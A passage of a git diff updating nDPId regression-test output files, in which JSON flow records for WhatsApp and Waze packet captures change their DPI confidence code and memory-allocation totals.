{"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455688445,"flow_last_seen":1561455726442,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1561455731665,"flow_last_seen":1561455741046,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1561455689909,"flow_last_seen":1561455690302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21432,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455706979,"flow_last_seen":1561455716020,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455741484,"flow_last_seen":1561455742405,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":263,"flow_first_seen":1561455688704,"flow_last_seen":1561455743434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21081,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741420,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":3959,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455688445,"flow_last_seen":1561455726442,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1561455731665,"flow_last_seen":1561455741046,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1561455689909,"flow_last_seen":1561455690302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21432,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455706979,"flow_last_seen":1561455716020,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455741484,"flow_last_seen":1561455742405,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":263,"flow_first_seen":1561455688704,"flow_last_seen":1561455743434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21081,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741420,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":3959,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","packets-captured":736,"packets-processed":734,"total-skipped-flows":0,"total-l4-payload-len":128892,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":27,"total-detection-updates":8,"total-updates":0,"current-active-flows":0,"total-active-flows":28,"total-idle-flows":28,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":165,"global_ts_msec":1561455743434} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 736/734 
@@ -171,9 +171,9 @@ ~~ total active/idle flows...: 28/28 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5937669 bytes -~~ total memory freed........: 5937669 bytes -~~ total allocations/frees...: 118957/118957 +~~ total memory allocated....: 6071303 bytes +~~ total memory freed........: 6071303 bytes +~~ total allocations/frees...: 121719/121719 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 457 chars ~~ json string max len.......: 2425 chars diff --git a/test/results/waze.pcap.out b/test/results/waze.pcap.out index 110882dcf..edd584994 100644 --- a/test/results/waze.pcap.out +++ b/test/results/waze.pcap.out 
@@ -5,13 +5,13 @@ 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1435587867103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587867103,"pkt":"ABoRAAACABoRAAABCABFAABNMsJAAEAGQsUKECWdriXnUaUQFGaA18okWhY9doAYAVcoEAAAAQEICgAIa2tBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1435587867443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1435587867443,"pkt":"ABoRAAACABoRAAABCABFAABMAABAAEARHHkKCAAByFlLxrSGAHsAOIB9GwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANk705txaHKW"} 
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1435587867753,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1435587867753,"pkt":"ABoRAAACABoRAAABCABFAABMdHBAABAR2AjIWUvGCggAAQB7tIYAOEf+HAIA7AAAAUgAAAbvyDaVGNk70ieZS5oL2TvTm3FocpbZO9ObncvLHNk705ud0JHn"} 
00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867755,"flow_last_seen":1435587867755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587867755,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1435587867755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587867755,"pkt":"ABoRAAACABoRAAABCABFAAA8zNlAAEAGoisKCAABQSeAh9aDAFDjx6dUAAAAAKAC\/\/+uwgAAAgQFtAQCCAoACGuNAAAAAAEDAwg="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1435587867759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAodHFAABAGKqhBJ4CHCggAAQBQ1oMcOFir48enVVAS\/\/8NRwAA"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1435587867759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAozNpAAEAGoj4KCAABQSeAh9aDAFDjx6dVHDhYrFAQ\/\/8NSAAA"} 
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587867755,"flow_last_seen":1435587867781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1435587867781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":0,"content_type":"","user_agent":"Android"}} 